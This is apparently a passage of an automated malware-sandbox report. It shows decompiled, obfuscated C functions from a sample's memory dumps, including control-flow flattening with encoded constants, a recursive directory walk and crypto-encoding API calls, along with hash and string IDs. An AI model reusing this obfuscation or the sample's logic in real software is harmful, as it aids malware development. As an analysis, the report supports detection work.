                                              • Instruction Fuzzy Hash: EED101715083819FE364CF65C889A1FFBE1BBC4758F20891DF29A86260D7B58A49CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E00238F49() {
                                              				char _v520;
                                              				char _v1040;
                                              				signed int _v1044;
                                              				intOrPtr _v1048;
                                              				signed int _v1052;
                                              				signed int _v1056;
                                              				signed int _v1060;
                                              				signed int _v1064;
                                              				signed int _v1068;
                                              				signed int _v1072;
                                              				signed int _v1076;
                                              				signed int _v1080;
                                              				signed int _v1084;
                                              				signed int _v1088;
                                              				signed int _v1092;
                                              				signed int _v1096;
                                              				signed int _v1100;
                                              				signed int _v1104;
                                              				signed int _v1108;
                                              				signed int _v1112;
                                              				signed int _v1116;
                                              				signed int _v1120;
                                              				signed int _v1124;
                                              				signed int _v1128;
                                              				signed int _v1132;
                                              				signed int _v1136;
                                              				signed int _v1140;
                                              				signed int _v1144;
                                              				void* _t238;
                                              				void* _t239;
                                              				void* _t240;
                                              				void* _t245;
                                              				signed int _t249;
                                              				signed int _t250;
                                              				signed int _t251;
                                              				signed int _t252;
                                              				signed int _t253;
                                              				intOrPtr _t258;
                                              				void* _t264;
                                              				intOrPtr _t282;
                                              				void* _t286;
                                              				signed int* _t290;
                                              
                                              				_t290 =  &_v1144;
                                              				_v1044 = _v1044 & 0x00000000;
                                              				_v1048 = 0x4ebe6;
                                              				_v1128 = 0x778f;
                                              				_v1128 = _v1128 | 0xa1323825;
                                              				_t249 = 0x13;
                                              				_v1128 = _v1128 / _t249;
                                              				_v1128 = _v1128 << 2;
                                              				_t286 = 0x35c963e4;
                                              				_v1128 = _v1128 ^ 0x21ef9208;
                                              				_v1052 = 0x4cd;
                                              				_v1052 = _v1052 | 0x68cff677;
                                              				_v1052 = _v1052 ^ 0x68cf93fd;
                                              				_v1092 = 0x77ae;
                                              				_v1092 = _v1092 >> 0xa;
                                              				_v1092 = _v1092 ^ 0x00005fc7;
                                              				_v1060 = 0x2f45;
                                              				_v1060 = _v1060 | 0xa1a9613d;
                                              				_v1060 = _v1060 ^ 0xa1a96f30;
                                              				_v1096 = 0x6d0d;
                                              				_v1096 = _v1096 << 2;
                                              				_v1096 = _v1096 | 0xf85e23e8;
                                              				_v1096 = _v1096 ^ 0xf85f94d5;
                                              				_v1136 = 0xe906;
                                              				_t250 = 0x4b;
                                              				_v1136 = _v1136 * 0x76;
                                              				_v1136 = _v1136 + 0x8e3a;
                                              				_v1136 = _v1136 << 8;
                                              				_v1136 = _v1136 ^ 0x6bf6f1e6;
                                              				_v1104 = 0x5e2e;
                                              				_v1104 = _v1104 >> 0xd;
                                              				_v1104 = _v1104 * 0x2c;
                                              				_v1104 = _v1104 ^ 0x0000496b;
                                              				_v1144 = 0xf2e9;
                                              				_v1144 = _v1144 + 0xd50c;
                                              				_v1144 = _v1144 / _t250;
                                              				_v1144 = _v1144 ^ 0x9fddb036;
                                              				_v1144 = _v1144 ^ 0x9fdde12f;
                                              				_v1108 = 0x6902;
                                              				_v1108 = _v1108 | 0xfbe10d26;
                                              				_v1108 = _v1108 * 0x44;
                                              				_v1108 = _v1108 ^ 0xe7e09cc2;
                                              				_v1120 = 0xf3f1;
                                              				_v1120 = _v1120 + 0xffff8a4f;
                                              				_v1120 = _v1120 >> 6;
                                              				_v1120 = _v1120 * 0x67;
                                              				_v1120 = _v1120 ^ 0x0000b01d;
                                              				_v1088 = 0xb368;
                                              				_v1088 = _v1088 + 0x9734;
                                              				_v1088 = _v1088 ^ 0x00010c20;
                                              				_v1076 = 0x650d;
                                              				_v1076 = _v1076 ^ 0x0544b8d8;
                                              				_v1076 = _v1076 ^ 0x054483f2;
                                              				_v1056 = 0xabff;
                                              				_v1056 = _v1056 ^ 0x935518d0;
                                              				_v1056 = _v1056 ^ 0x9355abf6;
                                              				_v1068 = 0xb772;
                                              				_v1068 = _v1068 << 2;
                                              				_v1068 = _v1068 ^ 0x00028ed1;
                                              				_v1124 = 0xbc7e;
                                              				_v1124 = _v1124 * 0x39;
                                              				_v1124 = _v1124 + 0x3dff;
                                              				_v1124 = _v1124 ^ 0x966a7207;
                                              				_v1124 = _v1124 ^ 0x9640526c;
                                              				_v1132 = 0xba5f;
                                              				_v1132 = _v1132 << 0xb;
                                              				_v1132 = _v1132 << 5;
                                              				_t251 = 0x75;
                                              				_v1132 = _v1132 / _t251;
                                              				_v1132 = _v1132 ^ 0x0197c6fa;
                                              				_v1140 = 0x5fea;
                                              				_t252 = 0x3c;
                                              				_v1140 = _v1140 * 0xa;
                                              				_v1140 = _v1140 * 0x2d;
                                              				_v1140 = _v1140 >> 2;
                                              				_v1140 = _v1140 ^ 0x002a725f;
                                              				_v1100 = 0x79ec;
                                              				_v1100 = _v1100 << 8;
                                              				_v1100 = _v1100 ^ 0x69f808d7;
                                              				_v1100 = _v1100 ^ 0x69818172;
                                              				_v1084 = 0xd5eb;
                                              				_v1084 = _v1084 ^ 0xb139babe;
                                              				_v1084 = _v1084 ^ 0xb1392951;
                                              				_v1072 = 0x4dbe;
                                              				_v1072 = _v1072 ^ 0x00003bef;
                                              				_v1080 = 0x7ef4;
                                              				_v1080 = _v1080 / _t252;
                                              				_v1080 = _v1080 ^ 0x00000c75;
                                              				_v1112 = 0xcb8d;
                                              				_v1112 = _v1112 + 0x5361;
                                              				_v1112 = _v1112 + 0xffffff0c;
                                              				_v1112 = _v1112 ^ 0x00015b8c;
                                              				_v1064 = 0xba20;
                                              				_v1064 = _v1064 ^ 0x3b22f3f3;
                                              				_v1064 = _v1064 ^ 0x3b2222af;
                                              				_v1116 = 0xa287;
                                              				_v1116 = _v1116 + 0x9065;
                                              				_t253 = 0x5f;
                                              				_v1116 = _v1116 / _t253;
                                              				_v1116 = _v1116 + 0xffff8b94;
                                              				_v1116 = _v1116 ^ 0xffffc056;
                                              				_t238 = E002385BA(_t253);
                                              				do {
                                              					while(_t286 != 0x2b67e243) {
                                              						if(_t286 == 0x35036a43) {
                                              							_push( &_v1040);
                                              							_push( &_v520);
                                              							return E00227B63(_v1064, _v1116, __eflags);
                                              						}
                                              						if(_t286 == 0x35c963e4) {
                                              							_t286 = 0x39b3b44d;
                                              							continue;
                                              						}
                                              						_t295 = _t286 - 0x39b3b44d;
                                              						if(_t286 != 0x39b3b44d) {
                                              							goto L8;
                                              						}
                                              						_push(_v1092);
                                              						_t245 = E0023889D(0x23c9b0, _v1052, _t295);
                                              						_pop(_t264);
                                              						_t282 =  *0x23ca2c; // 0x4d8300
                                              						_t196 = _t282 + 0x230; // 0x700047
                                              						E0022C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x23ca2c, _t245,  &_v520);
                                              						_t238 = E00232025(_v1144, _t245, _v1108, _v1120);
                                              						_t290 =  &(_t290[9]);
                                              						_t286 = 0x2b67e243;
                                              					}
                                              					_push(_v1076);
                                              					_t239 = E0023889D(0x23c980, _v1088, __eflags);
                                              					_t240 = E00238C8F(_v1056);
                                              					_t258 =  *0x23ca2c; // 0x4d8300
                                              					_t210 = _t258 + 0x230; // 0x4d8530
                                              					E002229E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
                                              					_t238 = E00232025(_v1072, _t239, _v1080, _v1112);
                                              					_t290 =  &(_t290[0xc]);
                                              					_t286 = 0x35036a43;
                                              					L8:
                                              					__eflags = _t286 - 0x38d0088b;
                                              				} while (__eflags != 0);
                                              				return _t238;
                                              			}














































                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
                                              • API String ID: 0-1402005448
                                              • Opcode ID: d3bf207e22b52e11e7f13a02026bbfedc06e61e5dcf6df00202b020b23f4bb4a
                                              • Instruction ID: 237b7163dc6f5d39174d1ecd80c501c49dc883d5f6eba0a38b040e060e0bfed6
                                              • Opcode Fuzzy Hash: d3bf207e22b52e11e7f13a02026bbfedc06e61e5dcf6df00202b020b23f4bb4a
                                              • Instruction Fuzzy Hash: 78B132B141D3819FD358CF64C58A50BFBE1FBC4798F208A1DF595862A0C7B98A48CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E00231773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				char _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				void* __ecx;
                                              				void* _t131;
                                              				void* _t148;
                                              				void* _t151;
                                              				signed int _t162;
                                              				void* _t164;
                                              				signed int* _t167;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0022602B(_t131);
                                              				_v32 = 0x943f;
                                              				_t167 =  &(( &_v64)[6]);
                                              				_t164 = 0;
                                              				_t151 = 0x349de80e;
                                              				_t162 = 0x48;
                                              				_v32 = _v32 * 0x69;
                                              				_v32 = _v32 ^ 0x003ccdd6;
                                              				_v56 = 0x5d22;
                                              				_v56 = _v56 << 0xb;
                                              				_v56 = _v56 * 0x6c;
                                              				_v56 = _v56 >> 0xc;
                                              				_v56 = _v56 ^ 0x0003a52d;
                                              				_v48 = 0xb9ad;
                                              				_v48 = _v48 / _t162;
                                              				_v48 = _v48 | 0x8e45101b;
                                              				_v48 = _v48 ^ 0xce45129f;
                                              				_v16 = 0x4535;
                                              				_v16 = _v16 + 0xffff440f;
                                              				_v16 = _v16 ^ 0xbfff8944;
                                              				_v24 = 0xd710;
                                              				_v24 = _v24 << 4;
                                              				_v24 = _v24 ^ 0x000d4c75;
                                              				_v44 = 0x65fd;
                                              				_v44 = _v44 >> 2;
                                              				_v44 = _v44 | 0x32207922;
                                              				_v44 = _v44 ^ 0x322078de;
                                              				_v28 = 0xded8;
                                              				_v28 = _v28 ^ 0x86a01735;
                                              				_v28 = _v28 ^ 0x86a0c6d1;
                                              				_v64 = 0xdb93;
                                              				_v64 = _v64 + 0x597e;
                                              				_v64 = _v64 << 0xa;
                                              				_v64 = _v64 << 0xa;
                                              				_v64 = _v64 ^ 0x5110354e;
                                              				_v60 = 0x2ada;
                                              				_v60 = _v60 | 0x1c3e2a8f;
                                              				_v60 = _v60 + 0xf49a;
                                              				_v60 = _v60 ^ 0xe6209c52;
                                              				_v60 = _v60 ^ 0xfa1f8dfc;
                                              				_v20 = 0xdaa6;
                                              				_v20 = _v20 + 0xb461;
                                              				_v20 = _v20 ^ 0x0001dcca;
                                              				_v40 = 0x4872;
                                              				_v40 = _v40 >> 0xe;
                                              				_v40 = _v40 ^ 0xb451885a;
                                              				_v40 = _v40 ^ 0xb451b970;
                                              				_v36 = 0x262e;
                                              				_v36 = _v36 >> 0xf;
                                              				_v36 = _v36 + 0x6428;
                                              				_v36 = _v36 ^ 0x00003c11;
                                              				_v8 = 0x6e80;
                                              				_v8 = _v8 << 0xc;
                                              				_v8 = _v8 ^ 0x06e82b80;
                                              				_v12 = 0x3e9d;
                                              				_v12 = _v12 >> 3;
                                              				_v12 = _v12 ^ 0x00005153;
                                              				_v52 = 0x8462;
                                              				_v52 = _v52 ^ 0xcdf70fa2;
                                              				_v52 = _v52 ^ 0xe5a9b23c;
                                              				_v52 = _v52 | 0x26296c1d;
                                              				_v52 = _v52 ^ 0x2e7f2e4a;
                                              				do {
                                              					while(_t151 != 0x6cb1230) {
                                              						if(_t151 == 0x944062a) {
                                              							_push(_t151);
                                              							_push(_t151);
                                              							_t164 = E00228736(_v4 + _v4);
                                              							if(_t164 != 0) {
                                              								_t151 = 0x6cb1230;
                                              								continue;
                                              							}
                                              						} else {
                                              							if(_t151 == 0x30a4ce3e) {
                                              								_t148 = E002377A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
                                              								_t167 =  &(_t167[7]);
                                              								if(_t148 != 0) {
                                              									_t151 = 0x944062a;
                                              									continue;
                                              								}
                                              							} else {
                                              								if(_t151 != 0x349de80e) {
                                              									goto L11;
                                              								} else {
                                              									_t151 = 0x30a4ce3e;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						goto L12;
                                              					}
                                              					E002377A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
                                              					_t167 =  &(_t167[7]);
                                              					_t151 = 0x222ae378;
                                              					L11:
                                              				} while (_t151 != 0x222ae378);
                                              				L12:
                                              				return _t164;
                                              			}



























                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
                                              • API String ID: 0-656425227
                                              • Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                              • Instruction ID: b11a4c2d856b10af2c759e527eb0380ad501c71361e4b7d0a3a6a38043b2d59a
                                              • Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                              • Instruction Fuzzy Hash: F36121B11093429FD754CF60C89992BFBE1BBD5788F104A1DF69696260C3B5CA18CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                              • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                              • CoTaskMemAlloc.OLE32(?), ref: 10002782
                                              • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                              • CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                              • CoTaskMemFree.OLE32(?), ref: 100027D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
                                              • String ID: o
                                              • API String ID: 207024522-3306556724
                                              • Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                              • Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
                                              • Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                              • Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E00232B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                                              				char _v520;
                                              				char _v1040;
                                              				short _v1584;
                                              				short _v1586;
                                              				char _v1588;
                                              				signed int _v1632;
                                              				signed int _v1636;
                                              				unsigned int _v1640;
                                              				signed int _v1644;
                                              				signed int _v1648;
                                              				signed int _v1652;
                                              				signed int _v1656;
                                              				signed int _v1660;
                                              				signed int _v1664;
                                              				signed int _v1668;
                                              				signed int _v1672;
                                              				signed int _v1676;
                                              				signed int _v1680;
                                              				signed int _v1684;
                                              				signed int _v1688;
                                              				signed int _v1692;
                                              				signed int _v1696;
                                              				unsigned int _v1700;
                                              				signed int _v1704;
                                              				signed int _v1708;
                                              				signed int _v1712;
                                              				signed int _v1716;
                                              				signed int _v1720;
                                              				signed int _v1724;
                                              				signed int _v1728;
                                              				signed int _v1732;
                                              				signed int _v1736;
                                              				signed int _v1740;
                                              				signed int _v1744;
                                              				signed int _v1748;
                                              				signed int _v1752;
                                              				signed int _v1756;
                                              				signed int _v1760;
                                              				void* __edx;
                                              				void* _t314;
                                              				signed int _t340;
                                              				signed int _t342;
                                              				signed int _t346;
                                              				void* _t348;
                                              				void* _t354;
                                              				signed int _t358;
                                              				void* _t360;
                                              				void* _t389;
                                              				signed int _t400;
                                              				signed int _t401;
                                              				signed int _t402;
                                              				signed int _t403;
                                              				signed int _t404;
                                              				void* _t408;
                                              				void* _t409;
                                              
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t314);
                                              				_v1672 = 0x92f4;
                                              				_t409 = _t408 + 0x1c;
                                              				_t354 = 0x3181563a;
                                              				_t400 = 0x5d;
                                              				_v1672 = _v1672 / _t400;
                                              				_v1672 = _v1672 ^ 0xa72c55b3;
                                              				_v1672 = _v1672 ^ 0xa72c5437;
                                              				_v1736 = 0x461f;
                                              				_v1736 = _v1736 + 0xd353;
                                              				_v1736 = _v1736 + 0xffff7400;
                                              				_v1736 = _v1736 + 0xffff12e8;
                                              				_v1736 = _v1736 ^ 0xffffeb08;
                                              				_v1684 = 0x12ca;
                                              				_v1684 = _v1684 + 0xffffbd30;
                                              				_v1684 = _v1684 + 0xc084;
                                              				_v1684 = _v1684 ^ 0x00009b25;
                                              				_v1700 = 0x68fe;
                                              				_v1700 = _v1700 >> 0x10;
                                              				_v1700 = _v1700 >> 0xf;
                                              				_v1700 = _v1700 ^ 0x000058ac;
                                              				_v1676 = 0xc4c1;
                                              				_v1676 = _v1676 + 0x377e;
                                              				_v1676 = _v1676 + 0xffff6b29;
                                              				_v1676 = _v1676 ^ 0x0000377c;
                                              				_v1708 = 0x7055;
                                              				_v1708 = _v1708 << 0xe;
                                              				_v1708 = _v1708 ^ 0x1eb23ae3;
                                              				_v1708 = _v1708 ^ 0x02a72f08;
                                              				_v1648 = 0x750a;
                                              				_v1648 = _v1648 | 0xec573941;
                                              				_v1648 = _v1648 ^ 0xec5707ed;
                                              				_v1744 = 0xfcbf;
                                              				_t401 = 0x2c;
                                              				_v1744 = _v1744 * 0x3d;
                                              				_v1744 = _v1744 >> 0xd;
                                              				_v1744 = _v1744 / _t401;
                                              				_v1744 = _v1744 ^ 0x00003058;
                                              				_v1636 = 0x9933;
                                              				_v1636 = _v1636 << 3;
                                              				_v1636 = _v1636 ^ 0x0004b1ef;
                                              				_v1668 = 0xb76d;
                                              				_v1668 = _v1668 | 0xef4f757f;
                                              				_v1668 = _v1668 ^ 0xef4ff671;
                                              				_v1656 = 0xf145;
                                              				_v1656 = _v1656 + 0x1194;
                                              				_v1656 = _v1656 ^ 0x00010bb0;
                                              				_v1752 = 0xf3e9;
                                              				_t402 = 0x49;
                                              				_v1752 = _v1752 / _t402;
                                              				_v1752 = _v1752 + 0x9c03;
                                              				_v1752 = _v1752 + 0xffffb211;
                                              				_v1752 = _v1752 ^ 0x000027fb;
                                              				_v1728 = 0x648a;
                                              				_v1728 = _v1728 ^ 0x1010be16;
                                              				_v1728 = _v1728 * 0x14;
                                              				_v1728 = _v1728 | 0x258edfa9;
                                              				_v1728 = _v1728 ^ 0x65dfe7b9;
                                              				_v1688 = 0x4eab;
                                              				_v1688 = _v1688 << 0xa;
                                              				_v1688 = _v1688 | 0x3ca08384;
                                              				_v1688 = _v1688 ^ 0x3dba9eb2;
                                              				_v1756 = 0xd2f4;
                                              				_t403 = 0x23;
                                              				_v1756 = _v1756 / _t403;
                                              				_v1756 = _v1756 ^ 0xcde225b2;
                                              				_t404 = 0x6e;
                                              				_v1756 = _v1756 / _t404;
                                              				_v1756 = _v1756 ^ 0x01df76bd;
                                              				_v1760 = 0x6cd1;
                                              				_v1760 = _v1760 * 0x7d;
                                              				_v1760 = _v1760 ^ 0x8e200a23;
                                              				_v1760 = _v1760 >> 3;
                                              				_v1760 = _v1760 ^ 0x11c2d811;
                                              				_v1640 = 0xac3a;
                                              				_v1640 = _v1640 >> 3;
                                              				_v1640 = _v1640 ^ 0x00004856;
                                              				_v1748 = 0x4fc2;
                                              				_v1748 = _v1748 >> 0xf;
                                              				_v1748 = _v1748 * 0x31;
                                              				_v1748 = _v1748 ^ 0x38a83a44;
                                              				_v1748 = _v1748 ^ 0x38a82be9;
                                              				_v1680 = 0xb86a;
                                              				_v1680 = _v1680 | 0x02231922;
                                              				_v1680 = _v1680 + 0xaf06;
                                              				_v1680 = _v1680 ^ 0x022411a2;
                                              				_v1644 = 0x3f39;
                                              				_v1644 = _v1644 + 0xffff5bb9;
                                              				_v1644 = _v1644 ^ 0xffffc632;
                                              				_v1692 = 0xc5f9;
                                              				_v1692 = _v1692 ^ 0xaafe79bc;
                                              				_v1692 = _v1692 >> 0xf;
                                              				_v1692 = _v1692 ^ 0x00013e0d;
                                              				_v1740 = 0x58ed;
                                              				_v1740 = _v1740 + 0xffff3fce;
                                              				_v1740 = _v1740 * 0x34;
                                              				_v1740 = _v1740 * 0x49;
                                              				_v1740 = _v1740 ^ 0xfa04971a;
                                              				_v1696 = 0xcc7a;
                                              				_v1696 = _v1696 >> 4;
                                              				_v1696 = _v1696 << 1;
                                              				_v1696 = _v1696 ^ 0x00000d26;
                                              				_v1732 = 0xc33a;
                                              				_v1732 = _v1732 | 0xb66c57ae;
                                              				_v1732 = _v1732 >> 5;
                                              				_v1732 = _v1732 * 0x56;
                                              				_v1732 = _v1732 ^ 0xea449beb;
                                              				_v1712 = 0xdae0;
                                              				_v1712 = _v1712 >> 0xc;
                                              				_v1712 = _v1712 ^ 0xc13d67df;
                                              				_v1712 = _v1712 ^ 0xc13d455b;
                                              				_v1716 = 0x5478;
                                              				_v1716 = _v1716 | 0xa382055d;
                                              				_v1716 = _v1716 * 0x26;
                                              				_v1716 = _v1716 ^ 0x4558c259;
                                              				_v1720 = 0xeafc;
                                              				_v1720 = _v1720 + 0xffff5250;
                                              				_v1720 = _v1720 ^ 0x4a0f2ed9;
                                              				_v1720 = _v1720 ^ 0x4a0f1f8c;
                                              				_v1664 = 0x8e28;
                                              				_v1664 = _v1664 ^ 0x7b061f8d;
                                              				_v1664 = _v1664 + 0xffffa0ec;
                                              				_v1664 = _v1664 ^ 0x7b062de0;
                                              				_v1724 = 0xce31;
                                              				_v1724 = _v1724 << 0xe;
                                              				_v1724 = _v1724 << 7;
                                              				_v1724 = _v1724 << 5;
                                              				_v1724 = _v1724 ^ 0xc4004273;
                                              				_v1704 = 0xa554;
                                              				_v1704 = _v1704 << 5;
                                              				_v1704 = _v1704 * 0x35;
                                              				_v1704 = _v1704 ^ 0x04475614;
                                              				_v1660 = 0xb9dc;
                                              				_v1660 = _v1660 + 0x9e03;
                                              				_v1660 = _v1660 ^ 0x00011a8b;
                                              				_v1652 = 0xf227;
                                              				_t399 = _v1660;
                                              				_v1652 = _v1652 / _t404;
                                              				_v1652 = _v1652 ^ 0x00007d1f;
                                              				while(1) {
                                              					L1:
                                              					_t389 = 0x2e;
                                              					L2:
                                              					while(_t354 != 0x2ecc014) {
                                              						if(_t354 == 0xf8b22d1) {
                                              							__eflags = _v1632 & _v1672;
                                              							if(__eflags == 0) {
                                              								_t340 = _a8( &_v1632, _a20);
                                              								asm("sbb ecx, ecx");
                                              								_t358 =  ~_t340 & 0x1c386f3a;
                                              								L13:
                                              								_t354 = _t358 + 0x2ecc014;
                                              								while(1) {
                                              									L1:
                                              									_t389 = 0x2e;
                                              									goto L2;
                                              								}
                                              							}
                                              							__eflags = _v1588 - _t389;
                                              							if(_v1588 != _t389) {
                                              								L20:
                                              								__eflags = _a16;
                                              								if(__eflags != 0) {
                                              									_push(_v1760);
                                              									_t348 = E0023889D(0x23c0b0, _v1756, __eflags);
                                              									_pop(_t360);
                                              									E0022C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
                                              									E00232B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
                                              									_t409 = _t409 + 0x30;
                                              									_t346 = E00232025(_v1732, _t348, _v1712, _v1716);
                                              									_t389 = 0x2e;
                                              								}
                                              								L19:
                                              								_t354 = 0x1f252f4e;
                                              								continue;
                                              							}
                                              							__eflags = _v1586;
                                              							if(__eflags == 0) {
                                              								goto L19;
                                              							}
                                              							__eflags = _v1586 - _t389;
                                              							if(_v1586 != _t389) {
                                              								goto L20;
                                              							}
                                              							__eflags = _v1584;
                                              							if(__eflags != 0) {
                                              								goto L20;
                                              							}
                                              							goto L19;
                                              						}
                                              						if(_t354 == 0x1f252f4e) {
                                              							_t342 = E0022595A(_v1720, _t399,  &_v1632, _v1664);
                                              							asm("sbb ecx, ecx");
                                              							_t358 =  ~_t342 & 0x0c9e62bd;
                                              							__eflags = _t358;
                                              							goto L13;
                                              						}
                                              						if(_t354 == 0x21983c19) {
                                              							_push(_v1684);
                                              							E00237BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0023889D(0x23c090, _v1736, __eflags));
                                              							_t346 = E00232025(_v1744, _t343, _v1636, _v1668);
                                              							_t409 = _t409 + 0x20;
                                              							_t354 = 0x3298743a;
                                              							while(1) {
                                              								L1:
                                              								_t389 = 0x2e;
                                              								goto L2;
                                              							}
                                              						}
                                              						if(_t354 == 0x3181563a) {
                                              							_t354 = 0x21983c19;
                                              							continue;
                                              						}
                                              						if(_t354 != 0x3298743a) {
                                              							L24:
                                              							__eflags = _t354 - 0x2a8aa181;
                                              							if(__eflags != 0) {
                                              								continue;
                                              							}
                                              							L25:
                                              							return _t346;
                                              						}
                                              						_t346 = E0022109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
                                              						_t399 = _t346;
                                              						_t409 = _t409 + 0x10;
                                              						if(_t346 == 0xffffffff) {
                                              							goto L25;
                                              						}
                                              						_t354 = 0xf8b22d1;
                                              						goto L1;
                                              					}
                                              					E00221B5C(_v1724, _v1704, _v1660, _t399, _v1652);
                                              					_t409 = _t409 + 0xc;
                                              					_t354 = 0x2a8aa181;
                                              					_t389 = 0x2e;
                                              					goto L24;
                                              				}
                                              			}
                                              0x0023308e
                                              0x00000000
                                              0x0023308e
                                              0x00232fb3
                                              0x0023300c
                                              0x00233044
                                              0x0023305d
                                              0x00233062
                                              0x00233065
                                              0x00232f8a
                                              0x00232f8a
                                              0x00232f8c
                                              0x00000000
                                              0x00232f8c
                                              0x00232f8a
                                              0x00232fbb
                                              0x00233005
                                              0x00000000
                                              0x00233005
                                              0x00232fc3
                                              0x002331cc
                                              0x002331cc
                                              0x002331d2
                                              0x00000000
                                              0x00000000
                                              0x002331e1
                                              0x002331e1
                                              0x002331e1
                                              0x00232feb
                                              0x00232ff0
                                              0x00232ff2
                                              0x00232ff8
                                              0x00000000
                                              0x00000000
                                              0x00232ffe
                                              0x00000000
                                              0x00232ffe
                                              0x002331bc
                                              0x002331c1
                                              0x002331c4
                                              0x002331cb
                                              0x00000000
                                              0x002331cb

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
                                              • API String ID: 0-983689062
                                              • Opcode ID: 3d071cf582f05614619fa7d835275f0f0a7ac06857365cff3d79a8ba7f38d41c
                                              • Instruction ID: 8f869d699ce5bafa2fa4ff4642aedf921f478db2a9fda1f07ae69ff4781602bb
                                              • Opcode Fuzzy Hash: 3d071cf582f05614619fa7d835275f0f0a7ac06857365cff3d79a8ba7f38d41c
                                              • Instruction Fuzzy Hash: 0BF122B15183819FD368CF61C549A5FFBF1BBC4308F108A1DF29A862A0D7B58A59CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 99%
                                              			E002288E5(intOrPtr __ecx, intOrPtr* __edx) {
                                              				intOrPtr _t325;
                                              				short* _t331;
                                              				signed int _t340;
                                              				signed int _t341;
                                              				signed int _t342;
                                              				signed int _t343;
                                              				short _t373;
                                              				void* _t376;
                                              				intOrPtr* _t380;
                                              				void* _t382;
                                              
                                              				 *(_t382 + 8) = 0xaa86;
                                              				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
                                              				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
                                              				 *(_t382 + 8) =  *(_t382 + 8) << 6;
                                              				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
                                              				 *(_t382 + 0x64) = 0xdd5d;
                                              				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
                                              				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
                                              				 *(_t382 + 0x74) = 0x57af;
                                              				_t380 = __edx;
                                              				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
